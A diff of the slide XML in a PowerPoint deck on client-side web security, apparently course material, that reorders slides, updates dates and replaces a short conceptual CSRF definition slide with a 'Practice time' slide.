--- a/files/client_side.pptx
+++ b/files/client_side.pptx
@@ -5,7 +5,7 @@
     <p:sldMasterId id="2147483648" r:id="rId1"/>
   </p:sldMasterIdLst>
   <p:notesMasterIdLst>
-    <p:notesMasterId r:id="rId18"/>
+    <p:notesMasterId r:id="rId15"/>
   </p:notesMasterIdLst>
   <p:sldIdLst>
     <p:sldId id="276" r:id="rId2"/>
@@ -15,15 +15,12 @@
     <p:sldId id="258" r:id="rId6"/>
     <p:sldId id="268" r:id="rId7"/>
     <p:sldId id="284" r:id="rId8"/>
-    <p:sldId id="285" r:id="rId9"/>
-    <p:sldId id="289" r:id="rId10"/>
-    <p:sldId id="279" r:id="rId11"/>
-    <p:sldId id="290" r:id="rId12"/>
-    <p:sldId id="291" r:id="rId13"/>
-    <p:sldId id="275" r:id="rId14"/>
-    <p:sldId id="292" r:id="rId15"/>
-    <p:sldId id="286" r:id="rId16"/>
-    <p:sldId id="287" r:id="rId17"/>
+    <p:sldId id="279" r:id="rId9"/>
+    <p:sldId id="290" r:id="rId10"/>
+    <p:sldId id="292" r:id="rId11"/>
+    <p:sldId id="286" r:id="rId12"/>
+    <p:sldId id="293" r:id="rId13"/>
+    <p:sldId id="287" r:id="rId14"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -212,7 +209,7 @@
           <a:p>
             <a:fld id="{A9881B1C-CF05-0F44-A33E-A38439A627E4}" type="datetimeFigureOut">
               <a:rPr lang="en-IL" smtClean="0"/>
-              <a:t>11/26/2024</a:t>
+              <a:t>14/11/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-IL"/>
           </a:p>
@@ -629,7 +626,7 @@
           <a:p>
             <a:fld id="{C2E715B0-74F3-B64E-A730-C7F3E6BEB915}" type="slidenum">
               <a:rPr lang="en-IL" smtClean="0"/>
-              <a:t>10</a:t>
+              <a:t>8</a:t>
             </a:fld>
             <a:endParaRPr lang="en-IL"/>
           </a:p>
@@ -714,7 +711,7 @@
           <a:p>
             <a:fld id="{C2E715B0-74F3-B64E-A730-C7F3E6BEB915}" type="slidenum">
               <a:rPr lang="en-IL" smtClean="0"/>
-              <a:t>13</a:t>
+              <a:t>10</a:t>
             </a:fld>
             <a:endParaRPr lang="en-IL"/>
           </a:p>
@@ -723,7 +720,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1251682440"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="927417906"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -799,7 +796,7 @@
           <a:p>
             <a:fld id="{C2E715B0-74F3-B64E-A730-C7F3E6BEB915}" type="slidenum">
               <a:rPr lang="en-IL" smtClean="0"/>
-              <a:t>14</a:t>
+              <a:t>11</a:t>
             </a:fld>
             <a:endParaRPr lang="en-IL"/>
           </a:p>
@@ -808,7 +805,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="927417906"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2869464736"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -823,7 +820,13 @@
   <p:cSld>
     <p:spTree>
       <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
+        <p:cNvPr id="1" name="">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5016932A-52AC-09A2-885E-B8D3327608F5}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
         <p:cNvGrpSpPr/>
         <p:nvPr/>
       </p:nvGrpSpPr>
@@ -837,7 +840,13 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="2" name="Slide Image Placeholder 1"/>
+          <p:cNvPr id="2" name="Slide Image Placeholder 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68B2F506-31BF-1DCE-6618-51293EF9A121}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
           <p:cNvSpPr>
             <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
           </p:cNvSpPr>
@@ -849,7 +858,13 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="3" name="Notes Placeholder 2"/>
+          <p:cNvPr id="3" name="Notes Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BC1A081-8842-5BBD-61A0-18D6DCA56C18}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -869,7 +884,13 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78646808-292B-79C0-107B-5E39AB7F5666}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -884,7 +905,7 @@
           <a:p>
             <a:fld id="{C2E715B0-74F3-B64E-A730-C7F3E6BEB915}" type="slidenum">
               <a:rPr lang="en-IL" smtClean="0"/>
-              <a:t>15</a:t>
+              <a:t>12</a:t>
             </a:fld>
             <a:endParaRPr lang="en-IL"/>
           </a:p>
@@ -893,7 +914,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2869464736"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4156308841"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -969,7 +990,7 @@
           <a:p>
             <a:fld id="{C2E715B0-74F3-B64E-A730-C7F3E6BEB915}" type="slidenum">
               <a:rPr lang="en-IL" smtClean="0"/>
-              <a:t>16</a:t>
+              <a:t>13</a:t>
             </a:fld>
             <a:endParaRPr lang="en-IL"/>
           </a:p>
@@ -1137,7 +1158,7 @@
           <a:p>
             <a:fld id="{01F9F28E-B300-B343-AE70-8AAEBE22BCA3}" type="datetimeFigureOut">
               <a:rPr lang="en-IL" smtClean="0"/>
-              <a:t>11/26/2024</a:t>
+              <a:t>14/11/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-IL"/>
           </a:p>
@@ -1337,7 +1358,7 @@
           <a:p>
             <a:fld id="{01F9F28E-B300-B343-AE70-8AAEBE22BCA3}" type="datetimeFigureOut">
               <a:rPr lang="en-IL" smtClean="0"/>
-              <a:t>11/26/2024</a:t>
+              <a:t>14/11/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-IL"/>
           </a:p>
@@ -1547,7 +1568,7 @@
           <a:p>
             <a:fld id="{01F9F28E-B300-B343-AE70-8AAEBE22BCA3}" type="datetimeFigureOut">
               <a:rPr lang="en-IL" smtClean="0"/>
-              <a:t>11/26/2024</a:t>
+              <a:t>14/11/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-IL"/>
           </a:p>
@@ -1747,7 +1768,7 @@
           <a:p>
             <a:fld id="{01F9F28E-B300-B343-AE70-8AAEBE22BCA3}" type="datetimeFigureOut">
               <a:rPr lang="en-IL" smtClean="0"/>
-              <a:t>11/26/2024</a:t>
+              <a:t>14/11/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-IL"/>
           </a:p>
@@ -2023,7 +2044,7 @@
           <a:p>
             <a:fld id="{01F9F28E-B300-B343-AE70-8AAEBE22BCA3}" type="datetimeFigureOut">
               <a:rPr lang="en-IL" smtClean="0"/>
-              <a:t>11/26/2024</a:t>
+              <a:t>14/11/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-IL"/>
           </a:p>
@@ -2291,7 +2312,7 @@
           <a:p>
             <a:fld id="{01F9F28E-B300-B343-AE70-8AAEBE22BCA3}" type="datetimeFigureOut">
               <a:rPr lang="en-IL" smtClean="0"/>
-              <a:t>11/26/2024</a:t>
+              <a:t>14/11/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-IL"/>
           </a:p>
@@ -2706,7 +2727,7 @@
           <a:p>
             <a:fld id="{01F9F28E-B300-B343-AE70-8AAEBE22BCA3}" type="datetimeFigureOut">
               <a:rPr lang="en-IL" smtClean="0"/>
-              <a:t>11/26/2024</a:t>
+              <a:t>14/11/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-IL"/>
           </a:p>
@@ -2848,7 +2869,7 @@
           <a:p>
             <a:fld id="{01F9F28E-B300-B343-AE70-8AAEBE22BCA3}" type="datetimeFigureOut">
               <a:rPr lang="en-IL" smtClean="0"/>
-              <a:t>11/26/2024</a:t>
+              <a:t>14/11/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-IL"/>
           </a:p>
@@ -2961,7 +2982,7 @@
           <a:p>
             <a:fld id="{01F9F28E-B300-B343-AE70-8AAEBE22BCA3}" type="datetimeFigureOut">
               <a:rPr lang="en-IL" smtClean="0"/>
-              <a:t>11/26/2024</a:t>
+              <a:t>14/11/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-IL"/>
           </a:p>
@@ -3274,7 +3295,7 @@
           <a:p>
             <a:fld id="{01F9F28E-B300-B343-AE70-8AAEBE22BCA3}" type="datetimeFigureOut">
               <a:rPr lang="en-IL" smtClean="0"/>
-              <a:t>11/26/2024</a:t>
+              <a:t>14/11/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-IL"/>
           </a:p>
@@ -3563,7 +3584,7 @@
           <a:p>
             <a:fld id="{01F9F28E-B300-B343-AE70-8AAEBE22BCA3}" type="datetimeFigureOut">
               <a:rPr lang="en-IL" smtClean="0"/>
-              <a:t>11/26/2024</a:t>
+              <a:t>14/11/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-IL"/>
           </a:p>
@@ -3806,7 +3827,7 @@
           <a:p>
             <a:fld id="{01F9F28E-B300-B343-AE70-8AAEBE22BCA3}" type="datetimeFigureOut">
               <a:rPr lang="en-IL" smtClean="0"/>
-              <a:t>11/26/2024</a:t>
+              <a:t>14/11/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-IL"/>
           </a:p>
@@ -4489,56 +4510,6 @@
           </a:fontRef>
         </p:style>
       </p:cxnSp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="16" name="TextBox 15">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9394D29-BC34-199F-B7B9-48169D245347}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="2072666" y="5371443"/>
-            <a:ext cx="6261812" cy="369332"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>Winter 24/25</a:t>
-            </a:r>
-            <a:endParaRPr lang="he-IL" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="bg1"/>
-              </a:solidFill>
-              <a:effectLst/>
-              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
       <p:pic>
         <p:nvPicPr>
           <p:cNvPr id="20" name="Picture 19">
@@ -4604,7 +4575,7 @@
           <p:cNvPr id="5" name="Picture 4">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2FC6D6F-4E9C-868A-98B1-1DA0DDA1F996}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5B5E059-5994-DBF7-AC04-B767191E9B5D}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -4615,8 +4586,9 @@
         </p:nvPicPr>
         <p:blipFill>
           <a:blip r:embed="rId3"/>
-          <a:srcRect/>
-          <a:stretch/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
         </p:blipFill>
         <p:spPr>
           <a:xfrm>
@@ -4630,62 +4602,10 @@
       </p:pic>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="6" name="Rectangle 5">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3311EF23-F64A-C782-28EA-1A8D297A9F1D}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="0" y="0"/>
-            <a:ext cx="3721001" cy="6858000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:solidFill>
-            <a:srgbClr val="E2FE21"/>
-          </a:solidFill>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="2">
-            <a:schemeClr val="accent1">
-              <a:shade val="15000"/>
-            </a:schemeClr>
-          </a:lnRef>
-          <a:fillRef idx="1">
-            <a:schemeClr val="accent1"/>
-          </a:fillRef>
-          <a:effectRef idx="0">
-            <a:schemeClr val="accent1"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="lt1"/>
-          </a:fontRef>
-        </p:style>
-        <p:txBody>
-          <a:bodyPr rtlCol="0" anchor="ctr"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
-            <a:endParaRPr lang="en-IL" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="TextBox 3">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0871A74-CCF7-4C4E-1BED-D443B1E5C692}"/>
+          <p:cNvPr id="10" name="TextBox 9">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41D002C8-CC40-FE0D-6F22-238967E65159}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -4694,8 +4614,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="4652389" y="1227270"/>
-            <a:ext cx="6447129" cy="3079048"/>
+            <a:off x="2965094" y="4337270"/>
+            <a:ext cx="6261812" cy="919482"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4708,164 +4628,38 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr marL="285750" indent="-285750">
+            <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
               <a:lnSpc>
-                <a:spcPts val="2560"/>
+                <a:spcPts val="6000"/>
               </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
             </a:pPr>
             <a:r>
-              <a:rPr lang="en-US" dirty="0">
+              <a:rPr lang="en-US" sz="6500" b="1" dirty="0">
                 <a:solidFill>
                   <a:schemeClr val="bg1"/>
                 </a:solidFill>
-                <a:effectLst/>
                 <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                 <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
               </a:rPr>
-              <a:t>As the name suggests, CSRF is about </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" b="1" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>Forging (Faking) requests</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="285750" indent="-285750">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>It happens when the web application does not properly verify the </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" b="1" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>legitimacy</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t> of a request that it receives.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="285750" indent="-285750">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>CSRF attacks are usually a fancy name for </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" b="1" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>session hijacking </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>– where attackers use the victim’s </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" b="1" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>session</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t> on a website in order to perform unwanted actions on the victim’s behalf.</a:t>
-            </a:r>
+              <a:t>Practice time</a:t>
+            </a:r>
+            <a:endParaRPr lang="he-IL" sz="6500" b="1" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="bg1"/>
+              </a:solidFill>
+              <a:effectLst/>
+              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
+            </a:endParaRPr>
           </a:p>
         </p:txBody>
       </p:sp>
       <p:pic>
         <p:nvPicPr>
-          <p:cNvPr id="7" name="Picture 6">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E33D056-14AE-5D73-871C-973D5A05365A}"/>
+          <p:cNvPr id="20" name="Picture 19">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D4E373E-2B45-DD01-4EC1-69D14129ED2F}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -4876,78 +4670,83 @@
         </p:nvPicPr>
         <p:blipFill>
           <a:blip r:embed="rId4"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="-52426" y="6698054"/>
+            <a:ext cx="12296852" cy="166519"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="2" name="Picture 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74EDE1B2-AA06-4838-05EB-AC57A1D6F4EF}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId5"/>
           <a:srcRect/>
           <a:stretch/>
         </p:blipFill>
         <p:spPr>
           <a:xfrm>
-            <a:off x="8370558" y="524524"/>
-            <a:ext cx="2989117" cy="243717"/>
+            <a:off x="819301" y="524291"/>
+            <a:ext cx="10585095" cy="520900"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
           </a:prstGeom>
         </p:spPr>
       </p:pic>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="TextBox 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5834BB2-234E-BDD1-E7AE-CD78CC5E6535}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1"/>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="4" name="Picture 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9E494CD-45EB-20D5-25E7-31FAD1644ECD}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
           <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="633984" y="1254616"/>
-            <a:ext cx="2830735" cy="2298065"/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId6"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="5429250" y="2171772"/>
+            <a:ext cx="1333500" cy="1803400"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
           </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:lnSpc>
-                <a:spcPts val="4280"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="3600" b="1" spc="120" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="24272C"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
-                <a:cs typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>Cross site Request Forgery (CSRF)</a:t>
-            </a:r>
-            <a:endParaRPr lang="he-IL" sz="3600" b="1" spc="120" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="24272C"/>
-              </a:solidFill>
-              <a:effectLst/>
-              <a:latin typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
-              <a:cs typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1939679815"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1060426137"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -4979,349 +4778,7 @@
           <p:cNvPr id="5" name="Picture 4">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2FC6D6F-4E9C-868A-98B1-1DA0DDA1F996}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId2"/>
-          <a:srcRect/>
-          <a:stretch/>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="0" y="0"/>
-            <a:ext cx="12192000" cy="6858000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="6" name="Rectangle 5">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3311EF23-F64A-C782-28EA-1A8D297A9F1D}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="0" y="0"/>
-            <a:ext cx="3721001" cy="6858000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
